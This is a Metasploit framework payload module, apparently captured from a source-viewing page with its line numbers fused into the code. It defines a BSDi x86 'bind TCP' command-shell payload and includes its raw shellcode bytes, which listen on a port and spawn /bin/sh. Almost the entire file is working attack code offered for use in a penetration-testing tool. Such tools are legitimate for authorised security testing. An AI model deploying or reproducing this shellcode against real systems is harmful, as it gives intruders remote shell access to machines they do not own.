Path: blob/master/modules/payloads/singles/bsdi/x86/shell_bind_tcp.rb
21547 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45module MetasploitModule6CachedSize = 9078include Msf::Payload::Single9include Msf::Sessions::CommandShellOptions1011def initialize(info = {})12super(13merge_info(14info,15'Name' => 'BSDi Command Shell, Bind TCP Inline',16'Description' => 'Listen for a connection and spawn a command shell',17'Author' => [ 'skape', 'optyx' ],18'License' => MSF_LICENSE,19'Platform' => 'bsdi',20'Arch' => ARCH_X86,21'Handler' => Msf::Handler::BindTcp,22'Session' => Msf::Sessions::CommandShell,23'Payload' => {24'Offsets' =>25{26'LPORT' => [ 0x1f, 'n' ]27},28'Payload' =>29"\x89\xe5\x68\x00\x07\x00\xc3\xb8\x9a\x00\x00\x00\x99\x50\x89\xe6" \30"\x31\xc0\x50\x40\x50\x40\x50\xb0\x61\xff\xd6\x52\x68\x10\x02\xbf" \31"\xbf\x89\xe3\x6a\x10\x53\x50\x6a\x68\x58\xff\xd6\xb0\x6a\xff\xd6" \32"\x59\x52\x52\x51\xb0\x1e\xff\xd6\x97\x6a\x02\x59\x6a\x5a\x58\x51" \33"\x57\xff\xd6\x49\x79\xf6\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69" \34"\x6e\x89\xe3\x50\x54\x53\xb0\x3b\xff\xd6"35}36)37)38end39end404142